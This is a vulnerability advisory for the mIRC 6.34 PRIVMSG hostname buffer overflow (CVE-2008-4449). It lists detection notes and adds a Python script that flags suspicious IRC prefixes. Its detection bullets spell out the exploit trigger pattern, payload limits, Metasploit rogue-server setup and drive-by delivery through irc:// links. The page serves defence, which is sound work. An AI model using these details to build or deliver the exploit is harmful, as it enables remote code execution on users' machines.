CVE-2008-4449
published 2008-10-06

CVE-2008-4449: Stack-based buffer overflow in mIRC 6.34 allows remote attackers to execute arbitrary code via a long hostname in a PRIVMSG message.

Priority P356, critical, 9.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 38.74% (98.4th percentile)

Affected

1 ranges
Vendor | Product | Version range | Fixed in
mirc | mirc | |

Detection & IOCs (extracted from sources)

command: PRIVMSG wow : /FINGER wow
command: :my_irc_server.com 001 wow :Welcome to the Internet Relay Network wow
port: 6667
  • Detect oversized IRC PRIVMSG hostname: a PRIVMSG message with a hostname/prefix field of 307+ 'A' characters (or random alphanumeric) followed by binary data is the exploit trigger pattern.
  • Detect exploit PoC pattern: IRC PRIVMSG with a prefix of 313 'A' characters followed by two bytes \x43\x43 is the PoC trigger.
  • Payload bad characters for this exploit include null bytes, IRC control characters, and common special characters; network signatures should flag IRC PRIVMSG messages containing binary data in the source prefix field.
  • The exploit can be triggered via a browser by redirecting a victim to an irc:// URI pointing to the attacker's server, enabling drive-by exploitation.
  • Metasploit module listens on TCP port 6667 acting as a rogue IRC server; monitor for outbound mIRC connections to untrusted IRC servers on port 6667 followed by receipt of a PRIVMSG with a binary-laden prefix.
  • Due to payload space constraints (160 bytes), ordinal payloads may be required instead of full shellcode when using the Metasploit module.
  • The Metasploit module uses a StackAdjustment of -3500, which is an unusual value that may affect payload reliability on non-targeted configurations.
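
The prefix checks described in the detection notes above can be expressed as a small line inspector. This is an added example, not code from the advisory or from any detection product; the function names and sample lines are constructed, the 307-character threshold comes from the first bullet, and printable-ASCII prefixes are an assumption about the monitored network.

```python
# Added example: flag server-to-client IRC lines with a suspicious source prefix.
PREFIX_LIMIT = 307  # prefix length named in the first detection bullet above


def split_irc_line(raw: bytes):
    """Return (prefix, command) for one raw IRC line; prefix is b'' if absent."""
    line = raw.rstrip(b"\r\n")
    prefix = b""
    if line.startswith(b":"):
        prefix, _, line = line[1:].partition(b" ")
    command = line.lstrip(b" ").split(b" ", 1)[0].upper()
    return prefix, command


def check_line(raw: bytes):
    """Return findings for one line; an empty list means nothing was flagged."""
    prefix, command = split_irc_line(raw)
    if command != b"PRIVMSG":
        return []
    findings = []
    if len(prefix) >= PREFIX_LIMIT:
        findings.append("oversized-prefix")
    # Assumption: legitimate nick!user@host prefixes are printable ASCII.
    if any(b < 0x21 or b > 0x7E for b in prefix):
        findings.append("binary-in-prefix")
    return findings


# Constructed sample traffic (not captured data).
SAMPLES = [
    b":my_irc_server.com 001 wow :Welcome to the Internet Relay Network wow\r\n",
    b":alice!al@host.example PRIVMSG wow :hello\r\n",
    b":" + b"x" * 320 + b" PRIVMSG wow :hi\r\n",
    b":nick!u@h\xff\xfe PRIVMSG wow :hi\r\n",
]


def scan(lines):
    """Return (index, findings) for every flagged line."""
    return [(i, f) for i, line in enumerate(lines) if (f := check_line(line))]


if __name__ == "__main__":
    for index, findings in scan(SAMPLES):
        print(index, ",".join(findings))
```

The prefix is split at the first space, so a prefix that itself contains a space byte is cut short and the line is not recognised as a PRIVMSG; a production rule should treat an unparseable command after a prefix as its own finding.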